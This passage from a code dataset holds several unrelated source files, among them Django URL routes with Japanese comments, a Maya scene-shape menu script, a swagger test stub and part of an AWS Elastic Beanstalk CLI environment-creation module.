^\n # -----------------------------------------------\n # 1\n TicTacToeV2ConsumerCustom.as_asgi()),\n # ^\n # -----------------------------------\n # 2\n # 1. 例えば `http://example.com/tic-tac-toe/v2/playing/Elephant/` のようなURLのパスの部分の、Django での正規表現の書き方。\n # kw_room_name は変数として渡される\n # 2. クラス名とメソッド。 URL を ASGI形式にする\n\n # 〇×ゲームの練習3.1\n url(r'^tic-tac-toe/v3o1/playing/(?P<kw_room_name>\\w+)/$',\n # ^^^ three o one\n # -------------------------------------------------\n # 1\n TicTacToeV3o1ConsumerCustom.as_asgi()),\n # ^^^ three o one\n # -------------------------------------\n # 2\n # 1. 例えば `http://example.com/tic-tac-toe/v3o1/playing/Elephant/` のようなURLのパスの部分の、Django での正規表現の書き方。\n # -----------------------------------\n # kw_room_name は変数として渡される\n # 2. クラス名とメソッド。 URL を ASGI形式にする\n]\n"} {"ext": "py", "sha": "1a30b1d46538e642e226c9fbad175df5d2fc18a0", "content": "from base64 import b64encode\nimport datetime\nfrom enum import Enum\nfrom typing import Any, Union\nimport json\n\n\nclass _JsonEncoder(json.JSONEncoder):\n def default(self, o: Any) -> Union[str, float]:\n if isinstance(o, datetime.datetime):\n return o.astimezone(tz=datetime.timezone.utc).isoformat()\n if isinstance(o, datetime.timedelta):\n return o.total_seconds()\n if isinstance(o, bytes):\n return b64encode(o).decode('ascii')\n if isinstance(o, Enum):\n return o.name\n return super().default(o)\n\n\ndef json_dumps(o: Union[dict, list]) -> str:\n if isinstance(o, dict):\n o = {k: v for k, v in o.items() if not k.startswith('_')}\n return json.dumps(o, cls=_JsonEncoder, separators=(',', ':'))\n\n\ndef pagination_header(count: int, page: int, per_page: int) -> dict:\n return {\n 'X-Page': page,\n 'X-Per-Page': per_page,\n 'X-Total': count,\n 'X-Total-Pages': (count + (per_page - 1)) // per_page,\n }\n"} {"ext": "py", "sha": "1a30b3bf178c429b61826658b52140124b407180", "content": "##########################################################################\n#\n# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# * Neither the name of Image Engine Design nor the names of any\n# other contributors to this software may be used to endorse or\n# promote products derived from this software without specific prior\n# written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n# IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n##########################################################################\n\nimport maya.cmds\n\nimport IECore\nimport IECoreMaya\n\n__dagMenuCallbacks = []\n## Registers a callback to be used when creating the right click dag\n# menu for scene shapes. Callbacks should have the following signature :\n#\n# callback( menu, sceneShape ).\ndef addDagMenuCallback( callback ) :\n\n\tif not callback in __dagMenuCallbacks :\n\t\t__dagMenuCallbacks.append( callback )\n\n## Removes a callback previously added with addDagMenuCallback.\t\t\ndef removeDagMenuCallback( callback ) :\n\n\t__dagMenuCallbacks.remove( callback )\n\n## This is forwarded to by the ieSceneShapeDagMenuProc function in\n# ieSceneShape.mel\ndef _dagMenu( menu, sceneShape ) :\n\n\tsceneShapes = __selectedSceneShapes()\n\tif not sceneShapes:\n\t\treturn\n\t\n\tfnScS = []\n\tfor target in sceneShapes:\n\t\tfnScS.append( IECoreMaya.FnSceneShape( target ) )\n\t\n\tmaya.cmds.setParent( menu, menu=True )\n\n\tinvalidSceneShapes = __invalidSceneShapes( sceneShapes )\n\t\n\tif invalidSceneShapes:\n\t\tmaya.cmds.menuItem(\n\t\tlabel = \"Invalid Inputs for selected SceneShapes!\",\n\t\tradialPosition = \"N\",\n\t\t)\n\t\t\n\t# Component mode\n\telif fnScS[0].selectedComponentNames():\n\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\tlabel = \"Object\",\n\t\t\tradialPosition = \"N\",\n\t\t\tcommand = IECore.curry( __objectCallback, sceneShapes[0] ),\n\t\t\t)\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Print Component Names\",\n\t\t\t\tradialPosition = \"NW\",\n\t\t\t\tcommand = IECore.curry( __printComponents, sceneShapes[0] )\n\t\t\t)\n\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Print Selected Component Names\",\n\t\t\t\tradialPosition = \"NE\",\n\t\t\t\tcommand = IECore.curry( __printSelectedComponents, sceneShapes[0] )\n\t\t\t)\n\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Expand...\",\n\t\t\t\tradialPosition = \"SE\",\n\t\t\t\tsubMenu = True\n\t\t\t)\n\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Expand to Selected Components\",\n\t\t\t\tradialPosition = \"S\",\n\t\t\t\tcommand = IECore.curry( __expandToSelected, sceneShapes[0] )\n\t\t\t)\n\t\t\tmaya.cmds.setParent( \"..\", menu=True )\n\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Create Locator\",\n\t\t\t\tradialPosition = \"SW\",\n\t\t\t\tsubMenu = True,\n\t\t\t)\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"At Bound Min\",\n\t\t\t\tradialPosition = \"N\",\n\t\t\t\tcommand = IECore.curry( __createLocatorAtPoints, sceneShapes[0], [ \"Min\" ] ),\n\t\t\t)\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"At Bound Max\",\n\t\t\t\tradialPosition = \"NE\",\n\t\t\t\tcommand = IECore.curry( __createLocatorAtPoints, sceneShapes[0], [ \"Max\" ] ),\n\t\t\t)\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"At Bound Min And Max\",\n\t\t\t\tradialPosition = \"E\",\n\t\t\t\tcommand = IECore.curry( __createLocatorAtPoints, sceneShapes[0], [ \"Min\", \"Max\" ] ),\n\t\t\t)\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"At Bound Centre\",\n\t\t\t\tradialPosition = \"SE\",\n\t\t\t\tcommand = IECore.curry( __createLocatorAtPoints, sceneShapes[0], [ \"Center\" ] ),\n\t\t\t)\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"At Transform Origin\",\n\t\t\t\tradialPosition = \"S\",\n\t\t\t\tcommand = IECore.curry( __createLocatorWithTransform, sceneShapes[0] ),\n\t\t\t)\n\t\t\tmaya.cmds.setParent( \"..\", menu=True )\n\t\n\t# Object mode\n\telse:\n\t\t\n\t\tif len( sceneShapes ) == 1:\n\t\t\tif maya.cmds.getAttr( sceneShapes[0]+\".drawGeometry\" ) or maya.cmds.getAttr( sceneShapes[0]+\".drawChildBounds\" ):\n\t\t\t\tmaya.cmds.menuItem(\n\t\t\t\t\tlabel = \"Component\",\n\t\t\t\t\tradialPosition = \"N\",\n\t\t\t\t\tcommand = IECore.curry( __componentCallback, sceneShapes[0] )\n\t\t\t\t\t)\n\n\t\tmaya.cmds.menuItem(\n\t\t\tlabel = \"Preview...\",\n\t\t\tradialPosition = \"NW\",\n\t\t\tsubMenu = True\t\t\n\t\t)\n\t\n\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"All Geometry On\",\n\t\t\t\tradialPosition = \"E\",\n\t\t\t\tcommand = IECore.curry( __setChildrenPreviewAttributes, sceneShapes, \"drawGeometry\", True )\n\t\t\t)\n\t\t\n\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"All Child Bounds On\",\n\t\t\t\tradialPosition = \"SE\",\n\t\t\t\tcommand = IECore.curry( __setChildrenPreviewAttributes, sceneShapes, \"drawChildBounds\", True )\n\t\t\t)\n\t\t\n\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"All Root Bound On\",\n\t\t\t\tradialPosition = \"NE\",\n\t\t\t\tcommand = IECore.curry( __setChildrenPreviewAttributes, sceneShapes, \"drawRootBound\", True )\n\t\t\t)\n\t\t\n\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"All Geometry Off\",\n\t\t\t\tradialPosition = \"W\",\n\t\t\t\tcommand = IECore.curry( __setChildrenPreviewAttributes, sceneShapes, \"drawGeometry\", False )\n\t\t\t)\n\t\t\n\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"All Child Bounds Off\",\n\t\t\t\tradialPosition = \"SW\",\n\t\t\t\tcommand = IECore.curry( __setChildrenPreviewAttributes, sceneShapes, \"drawChildBounds\", False )\n\t\t\t)\n\t\t\n\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"All Root Bound Off\",\n\t\t\t\tradialPosition = \"NW\",\n\t\t\t\tcommand = IECore.curry( __setChildrenPreviewAttributes, sceneShapes, \"drawRootBound\", False )\n\t\t\t)\n\n\t\tmaya.cmds.setParent( \"..\", menu=True )\n\n\t\t\n\t\tcommonTags = None\n\t\tfor fn in fnScS:\n\t\t\tscene = fn.sceneInterface()\n\t\t\ttmpTags = scene.readTags(IECore.SceneInterface.EveryTag)\n\t\t\tif commonTags is None:\n\t\t\t\tcommonTags = set( tmpTags )\n\t\t\telse:\n\t\t\t\tcommonTags.intersection_update( set(tmpTags) )\n\t\t\t\t\n\t\ttagTree = dict()\n\t\tif not commonTags is None:\n\t\t\ttags = list(commonTags)\n\t\t\tfor tag in tags :\n\t\t\t\ttag = str(tag)\n\t\t\t\tparts = tag.split(\":\")\n\t\t\t\tleftOverTag = tag[len(parts[0])+1:]\n\t\t\t\tif not parts[0] in tagTree :\n\t\t\t\t\ttagTree[parts[0]] = [ leftOverTag ]\n\t\t\t\telse :\n\t\t\t\t\ttagTree[parts[0]].append( leftOverTag )\n\t\tif tagTree :\n\n\t\t\ttags = tagTree.keys()\n\t\t\ttags.sort()\n\n\t\t\tdef addTagSubMenuItems( command ):\n\n\t\t\t\timport copy\n\t\t\t\tcopiedTagTree = copy.deepcopy( tagTree )\n\n\t\t\t\tfor tag in tags :\n\t\t\t\t\t\n\t\t\t\t\tsubtags = copiedTagTree[tag]\n\t\t\t\t\tsubtags.sort()\n\n\t\t\t\t\tif \"\" in subtags:\n\t\t\t\t\t\tmaya.cmds.menuItem(\n\t\t\t\t\t\t\tlabel = tag,\n\t\t\t\t\t\t\tcommand = IECore.curry( command, sceneShapes, tag )\n\t\t\t\t\t\t)\n\t\t\t\t\t\tsubtags.remove(\"\")\n\t\t\t\t\t\n\t\t\t\t\tif subtags:\n\t\t\t\t\t\tmaya.cmds.menuItem(\n\t\t\t\t\t\t\tlabel = tag,\n\t\t\t\t\t\t\tsubMenu = True\n\t\t\t\t\t\t)\n\n\t\t\t\t\t\tfor tagSuffix in subtags :\n\t\t\t\t\t\t\tmaya.cmds.menuItem(\n\t\t\t\t\t\t\t\tlabel = tagSuffix,\n\t\t\t\t\t\t\t\tcommand = IECore.curry( command, sceneShapes, tag + \":\" + tagSuffix )\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\tmaya.cmds.setParent( \"..\", menu=True )\t\n\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Tags filter...\",\n\t\t\t\tradialPosition = \"S\",\n\t\t\t\tsubMenu = True\n\t\t\t)\n\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Display All\",\n\t\t\t\tcommand = IECore.curry( __setTagsFilterPreviewAttributes, sceneShapes, \"\" )\n\t\t\t)\n\n\t\t\taddTagSubMenuItems( __setTagsFilterPreviewAttributes )\n\t\t\t\t\t\n\t\t\tmaya.cmds.setParent( \"..\", menu=True )\t\t\t\n\t\t\t\n\t\tmaya.cmds.menuItem(\n\t\t\tlabel = \"Expand...\",\n\t\t\tradialPosition = \"SE\",\n\t\t\tsubMenu = True\n\t\t)\n\t\n\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Recursive Expand As Geometry\",\n\t\t\t\tradialPosition = \"W\",\n\t\t\t\tcommand = IECore.curry( __expandAsGeometry, sceneShapes )\n\t\t\t)\n\n\t\tif any( map(lambda x: x.canBeExpanded(), fnScS) ):\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Expand One Level\",\n\t\t\t\tradialPosition = \"E\",\n\t\t\t\tcommand = IECore.curry( __expandOnce, sceneShapes )\n\t\t\t)\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Recursive Expand\",\n\t\t\t\tradialPosition = \"N\",\n\t\t\t\tcommand = IECore.curry( __expandAll, sceneShapes )\n\t\t\t)\n\t\t\t\n\t\t\tif len( sceneShapes ) == 1:\n\t\t\t\tif fnScS[0].selectedComponentNames() :\n\t\t\t\t\tmaya.cmds.menuItem(\n\t\t\t\t\t\tlabel = \"Expand to Selected Components\",\n\t\t\t\t\t\tradialPosition = \"S\",\n\t\t\t\t\t\tcommand = IECore.curry( __expandToSelected, sceneShapes[0] )\n\t\t\t\t\t)\n\t\t\t\n\t\tif tagTree :\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Expand by Tag...\",\n\t\t\t\tradialPosition = \"S\",\n\t\t\t\tsubMenu = True\n\t\t\t)\n\t\t\n\t\t\taddTagSubMenuItems( __expandAll )\n\t\t\t\t\t\n\t\t\tmaya.cmds.setParent( \"..\", menu=True )\t\t\t\n\n\t\tmaya.cmds.setParent( \"..\", menu=True )\n\n\t\tparentSceneShape = __parentSceneShape( sceneShapes )\n\n\t\tif any( map(lambda x: x.canBeCollapsed(), fnScS) ) or ( parentSceneShape and IECoreMaya.FnSceneShape( parentSceneShape ).canBeCollapsed() ):\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\t\tlabel = \"Collapse...\",\n\t\t\t\t\tradialPosition = \"SW\",\n\t\t\t\t\tsubMenu = True\n\t\t\t\t)\n\t\t\t\n\t\t\tif parentSceneShape and IECoreMaya.FnSceneShape( parentSceneShape ).canBeCollapsed():\n\t\t\t\t\n\t\t\t\tparentName = maya.cmds.listRelatives( parentSceneShape, p=True )[0]\n\t\t\t\tmaya.cmds.menuItem(\n\t\t\t\t\t\tlabel = \"Collapse to Parent: \"+parentName,\n\t\t\t\t\t\tradialPosition = \"N\",\n\t\t\t\t\t\tcommand = IECore.curry( __collapseChildren, [parentSceneShape] )\n\t\t\t\t\t)\n\t\t\t\n\t\t\tif any( map(lambda x: x.canBeCollapsed(), fnScS) ):\n\t\t\t\tmaya.cmds.menuItem(\n\t\t\t\t\t\tlabel = \"Collapse Children\",\n\t\t\t\t\t\tradialPosition = \"W\",\n\t\t\t\t\t\tcommand = IECore.curry( __collapseChildren, sceneShapes )\n\t\t\t\t\t)\n\t\t\t\t\n\t\t\tmaya.cmds.setParent( \"..\", menu=True )\n\n\tfor c in __dagMenuCallbacks :\n\t\n\t\tc( menu, sceneShape )\n\n## Returns all the sceneShapes that do not have a valid scene interface\ndef __invalidSceneShapes( sceneShapes ):\n\t\n\tinvalid = []\n\tfor sceneShape in sceneShapes:\n\t\tfn = IECoreMaya.FnSceneShape( sceneShape )\n\t\tif fn.sceneInterface() is None:\n\t\t\tinvalid.append( sceneShape )\n\treturn invalid\n\n## Returns all the selected scene shapes\ndef __selectedSceneShapes() :\n\t\n\tallSceneShapes = []\n\t\n\tselectedSceneShapes = maya.cmds.ls( sl=True, l=True )\n\tfor shape in selectedSceneShapes:\n\t\t# Make sure we have the shape name, it could be a component \n\t\tshapeName = shape.split(\".f[\")[0]\n\t\tif maya.cmds.nodeType( shapeName ) == \"ieSceneShape\" and not shapeName in allSceneShapes:\n\t\t\tallSceneShapes.append( shapeName )\n\t\telse:\n\t\t\tchildren = maya.cmds.listRelatives( shapeName, children=True, type=\"ieSceneShape\", fullPath=True ) or []\n\t\t\tfor child in children:\n\t\t\t\tif not child in allSceneShapes:\n\t\t\t\t\tallSceneShapes.append( child )\n\treturn allSceneShapes\n\n## Turns on child bounds and switches to component mode\ndef __componentCallback( sceneShape, *unused ) :\n\n\tparent = maya.cmds.listRelatives( sceneShape, parent=True, fullPath=True )[0]\n\tmaya.cmds.selectType( ocm=True, alc=False, facet=True )\n\tmaya.cmds.hilite( parent )\n\t\n## Switches to object mode\ndef __objectCallback( sceneShape, *unused ) :\n\n\tparent = maya.cmds.listRelatives( sceneShape, parent=True, fullPath=True )[0]\n\tmaya.cmds.hilite( parent, unHilite=True )\n\tselection = maya.cmds.ls( selection=True )\n\tmaya.cmds.selectMode( object=True )\n\tif selection :\n\t\tmaya.cmds.select( selection, replace=True )\n\telse :\n\t\tmaya.cmds.select( clear=True )\n\n## Print the existing component names for the scene shape\ndef __printComponents( sceneShape, *unused ) :\n\n\tfnS = IECoreMaya.FnSceneShape( sceneShape )\n\tnames = fnS.componentNames()\n\tnames.sort()\n\tprint \"\\n\"\n\tprint \" \".join( names ) ,\n\tprint \"\\n\"\n\n## Print the selected component names for the scene shape\ndef __printSelectedComponents( sceneShape, *unused ) :\n\n\tfnS = IECoreMaya.FnSceneShape( sceneShape )\n\tselectedNames = fnS.selectedComponentNames()\n\tif selectedNames:\n\t\tselectedNames = list( selectedNames )\n\t\tselectedNames.sort()\n\t\tprint \"\\n\"\n\t\tprint \" \".join( selectedNames ) ,\n\t\tprint \"\\n\"\n\n## Expand each scene shape one level down\ndef __expandOnce( sceneShapes, *unused ) :\n\t\n\ttoSelect = []\n\tfor sceneShape in sceneShapes:\n\t\tfnS = IECoreMaya.FnSceneShape( sceneShape )\n\t\tnew = fnS.expandOnce( preserveNamespace=True )\n\t\ttoSelect.extend( map( lambda x: x.fullPathName(), new ) )\n\tif toSelect:\n\t\tmaya.cmds.select( toSelect, replace=True )\n\n## Recursively expand the scene shapes\ndef __expandAll( sceneShapes, tagName=None, *unused ) :\n\t\n\ttoSelect = []\n\tfor sceneShape in sceneShapes:\n\t\tfnS = IECoreMaya.FnSceneShape( sceneShape )\n\t\tnewFn = fnS.expandAll( preserveNamespace=True, tagName=tagName )\n\t\t\n\t\ttoSelect.extend( map( lambda x: x.fullPathName(), newFn ) )\n\tif toSelect:\n\t\tmaya.cmds.select( toSelect, replace=True )\n\n## Recursively expand the scene shapes and converts objects to geometry\ndef __expandAsGeometry( sceneShapes, *unused ) :\n\t\n\tfor sceneShape in sceneShapes:\n\t\tfnS = IECoreMaya.FnSceneShape( sceneShape )\n\t\tfnS.convertAllToGeometry( True )\n\n## Expand the scene shape the minimal amount to reach the selected components\ndef __expandToSelected( sceneShape, *unused ) :\n\n\tfnScS = IECoreMaya.FnSceneShape( sceneShape )\n\tsceneShape = fnScS.fullPathName()\n\tselectedNames = fnScS.selectedComponentNames()\n\tif not selectedNames:\n\t\treturn\n\t\n\tif \"/\" in selectedNames:\n\t\tselectedNames.remove(\"/\")\n\t\n\t# Go back to object mode\n\tparent = maya.cmds.listRelatives( sceneShape, parent=True, fullPath=True )[0]\n\tmaya.cmds.hilite( parent, unHilite=True )\n\tmaya.cmds.selectMode( object=True )\n\t\n\tif selectedNames == []:\n\t\treturn\n\t\n\ttoSelect = []\t\n\n\tfor selected in selectedNames:\n\t\ttransformName = parent\n\t\ttransformNames = [ transformName ]\n\t\tfor item in selected.split(\"/\")[1:-1]:\n\t\t\ttransformName = transformName + \"|\" + item\n\t\t\tif not transformName in transformNames:\n\t\t\t\ttransformNames.append( transformName )\n\t\t\n\t\tfor transform in transformNames:\n\t\t\tshape = maya.cmds.listRelatives( transform, fullPath=True, type = \"ieSceneShape\" )[0]\n\t\t\tfnS = IECoreMaya.FnSceneShape( shape )\n\t\t\tfnS.expandOnce()\n\t\t\n\t\ttoSelect.append( transformNames[-1] )\n\tif toSelect:\n\t\tmaya.cmds.select( toSelect, replace=True )\n\n## Collapse all the children of the scene shapes\ndef __collapseChildren( sceneShapes, *unused ) :\n\t\n\tfor sceneShape in sceneShapes:\n\t\tfnS = IECoreMaya.FnSceneShape( sceneShape )\n\t\tfnS.collapse()\n\n## Returns the first common parent scene shape for the given scene shapes\n# Returns None if no parent found.\ndef __parentSceneShape( sceneShapes ):\n\t\n\tdef getParentShapes( transform, allParentShapes ):\n\t\tparent = maya.cmds.listRelatives( transform, p=True, fullPath=True )\n\t\tif parent:\n\t\t\tparentShape = maya.cmds.listRelatives( parent[0], fullPath=True, type = \"ieSceneShape\" )\n\t\t\tif parentShape:\n\t\t\t allParentShapes.append( parentShape[0] )\n\t\t\t getParentShapes( parent[0], allParentShapes )\n\t\t\n\tparents = None\n\tfor sceneShape in sceneShapes:\n\t\ttransform = maya.cmds.listRelatives( sceneShape, parent=True, fullPath=True )\n\t\tif transform:\n\t\t\tallParentShapes = []\n\t\t\tgetParentShapes( transform[0], allParentShapes )\n\t\t\tif parents is None:\n\t\t\t\tparents = set( allParentShapes )\n\t\t\telse:\n\t\t\t\tparents.intersection_update( set(allParentShapes) )\n\tif parents:\n\t\tparent = \"\"\n\t\tfor p in parents:\n\t\t\tif p.count(\"|\") > parent.count(\"|\"):\n\t\t\t\tparent = p\n\t\treturn parent\n\n\treturn None\n\n## Sets the given preview attribute on the scene shapes with the given boolean value\n# Preview attributes can be drawGeometry, drawLocators, drawRootBound and drawChildBounds\ndef __setChildrenPreviewAttributes( sceneShapes, attributeName, value, *unused ) :\n\n\tfor sceneShape in sceneShapes:\n\t\ttransform = maya.cmds.listRelatives( sceneShape, parent=True, fullPath=True )\n\t\tif transform:\n\t\t\tallChildren = maya.cmds.listRelatives( transform[0], ad=True, fullPath=True, type = \"ieSceneShape\" ) or []\n\t\t\tfor node in allChildren:\n\t\t\t\tmaya.cmds.setAttr( node+\".\"+attributeName, value )\n\n## Sets the given tags filter attribute on the scene shapes with the given string value\ndef __setTagsFilterPreviewAttributes( sceneShapes, tagName, *unused ) :\n\n\tfor sceneShape in sceneShapes:\n\t\ttransform = maya.cmds.listRelatives( sceneShape, parent=True, fullPath=True )\n\t\tif transform:\n\t\t\tallChildren = maya.cmds.listRelatives( transform[0], ad=False, fullPath=True, type = \"ieSceneShape\" ) or []\n\t\t\tfor node in allChildren:\n\t\t\t\tmaya.cmds.setAttr( node+\".drawTagsFilter\", tagName, type = \"string\" )\n\ndef __createLocatorAtPoints( sceneShape, childPlugSuffixes, *unused ) :\n\t\n\tfnSc = IECoreMaya.FnSceneShape( sceneShape )\n\tselectedNames = fnSc.selectedComponentNames()\n\n\tlocators = []\n\tfor name in selectedNames :\n\t\tlocators.extend( fnSc.createLocatorAtPoints( name, childPlugSuffixes ) )\n\t\t\n\tmaya.cmds.select( locators, replace=True )\n\ndef __createLocatorWithTransform( sceneShape, *unused ) :\n\t\n\tfnSc = IECoreMaya.FnSceneShape( sceneShape )\n\tselectedNames = fnSc.selectedComponentNames()\n\n\tlocators = []\n\tfor name in selectedNames :\n\t\tlocators.append( fnSc.createLocatorAtTransform( name ) )\n\n\tmaya.cmds.select( locators, replace=True )\n\n"} {"ext": "py", "sha": "1a30b3c3dfb43823629a543fc5c03f20eed56230", "content": "# coding: utf-8\n\n\"\"\"\n Deep Lynx\n\n The construction of megaprojects has consistently demonstrated challenges for project managers in regard to meeting cost, schedule, and performance requirements. Megaproject construction challenges are common place within megaprojects with many active projects in the United States failing to meet cost and schedule efforts by significant margins. Currently, engineering teams operate in siloed tools and disparate teams where connections across design, procurement, and construction systems are translated manually or over brittle point-to-point integrations. The manual nature of data exchange increases the risk of silent errors in the reactor design, with each silent error cascading across the design. These cascading errors lead to uncontrollable risk during construction, resulting in significant delays and cost overruns. Deep Lynx allows for an integrated platform during design and operations of mega projects. The Deep Lynx Core API delivers a few main features. 1. Provides a set of methods and endpoints for manipulating data in an object oriented database. This allows us to store complex datatypes as records and then to compile them into actual, modifiable objects at run-time. Users can store taxonomies or ontologies in a readable format. 2. Provides methods for storing and retrieving data in a graph database. This data is structured and validated against the aformentioned object oriented database before storage. # noqa: E501\n\n OpenAPI spec version: 1.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport unittest\n\nimport swagger_client\nfrom swagger_client.models.credential_validation_result import CredentialValidationResult # noqa: E501\nfrom swagger_client.rest import ApiException\n\n\nclass TestCredentialValidationResult(unittest.TestCase):\n \"\"\"CredentialValidationResult unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testCredentialValidationResult(self):\n \"\"\"Test CredentialValidationResult\"\"\"\n # FIXME: construct object with mandatory attributes with example values\n # model = swagger_client.models.credential_validation_result.CredentialValidationResult() # noqa: E501\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a30b53279a33a64f5179950d3a2d31b389dfaae", "content": "# Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"). You\n# may not use this file except in compliance with the License. A copy of\n# the License is located at\n#\n# http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is\n# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. See the License for the specific\n# language governing permissions and limitations under the License.\n\nimport re\nimport time\n\nfrom cement.utils.misc import minimal_logger\n\nfrom ..lib import elasticbeanstalk, iam, utils\nfrom ..lib.aws import InvalidParameterValueError\nfrom ..core import io\nfrom ..objects.exceptions import TimeoutError, AlreadyExistsError, \\\n NotAuthorizedError, NotSupportedError\nfrom ..resources.strings import strings, responses, prompts\nfrom . import commonops\n\nLOG = minimal_logger(__name__)\nDEFAULT_ROLE_NAME = 'aws-elasticbeanstalk-ec2-role'\nDEFAULT_SERVICE_ROLE_NAME = 'aws-elasticbeanstalk-service-role'\n\n\ndef make_new_env(env_request, branch_default=False,\n nohang=False, interactive=True, timeout=None):\n resolve_roles(env_request, interactive)\n\n # deploy code\n if not env_request.sample_application and not env_request.version_label:\n io.log_info('Creating new application version using project code')\n env_request.version_label = \\\n commonops.create_app_version(env_request.app_name)\n\n if env_request.version_label is None or env_request.sample_application:\n env_request.version_label = \\\n commonops.create_dummy_app_version(env_request.app_name)\n\n # Create env\n if env_request.key_name:\n commonops.upload_keypair_if_needed(env_request.key_name)\n\n io.log_info('Creating new environment')\n result, request_id = create_env(env_request,\n interactive=interactive)\n\n env_name = result.name # get the (possibly) updated name\n\n # Edit configurations\n ## Get default environment\n default_env = commonops.get_current_branch_environment()\n ## Save env as branch default if needed\n if not default_env or branch_default:\n commonops.set_environment_for_current_branch(env_name)\n\n # Print status of env\n commonops.print_env_details(result, health=False)\n\n if nohang:\n return\n\n io.echo('Printing Status:')\n try:\n commonops.wait_for_success_events(request_id,\n timeout_in_minutes=timeout)\n except TimeoutError:\n io.log_error(strings['timeout.error'])\n\n\ndef create_env(env_request, interactive=True):\n # If a template is being used, we want to try using just the template\n if env_request.template_name:\n platform = env_request.platform\n env_request.platform = None\n else:\n platform = None\n while True:\n try:\n return elasticbeanstalk.create_environment(env_request)\n\n except InvalidParameterValueError as e:\n if e.message == responses['app.notexists'].replace(\n '{app-name}', '\\'' + env_request.app_name + '\\''):\n # App doesnt exist, must be a new region.\n ## Lets create the app in the region\n commonops.create_app(env_request.app_name)\n elif e.message == responses['create.noplatform']:\n if platform:\n env_request.platform = platform\n else:\n raise\n elif interactive:\n LOG.debug('creating env returned error: ' + e.message)\n if re.match(responses['env.cnamenotavailable'], e.message):\n io.echo(prompts['cname.unavailable'])\n cname = io.prompt_for_cname()\n elif re.match(responses['env.nameexists'], e.message):\n io.echo(strings['env.exists'])\n current_environments = commonops.get_all_env_names()\n unique_name = utils.get_unique_name(env_request.env_name,\n current_environments)\n env_request.env_name = io.prompt_for_environment_name(\n default_name=unique_name)\n elif e.message == responses['app.notexists'].replace(\n '{app-name}', '\\'' + env_request.app_name + '\\''):\n # App doesnt exist, must be a new region.\n ## Lets create the app in the region\n commonops.create_app(env_request.app_name)\n else:\n raise\n else:\n raise\n\n # Try again with new values\n\n\ndef get_default_profile():\n \"\"\" Get the default elasticbeanstalk IAM profile,\n Create it if it doesn't exist \"\"\"\n\n # get list of profiles\n try:\n profile = DEFAULT_ROLE_NAME\n try:\n iam.create_instance_profile(profile)\n io.log_info('Created default instance profile.')\n role = get_default_role()\n iam.add_role_to_profile(profile, role)\n except AlreadyExistsError:\n pass\n except NotAuthorizedError:\n # Not a root account. Just assume role exists\n io.log_info('No IAM privileges: assuming default '\n 'instance profile exists.')\n return DEFAULT_ROLE_NAME\n\n return profile\n\n\ndef get_default_role():\n role = DEFAULT_ROLE_NAME\n document = '{\"Version\": \"2008-10-17\",\"Statement\": [{\"Action\":' \\\n ' \"sts:AssumeRole\",\"Principal\": {\"Service\": ' \\\n 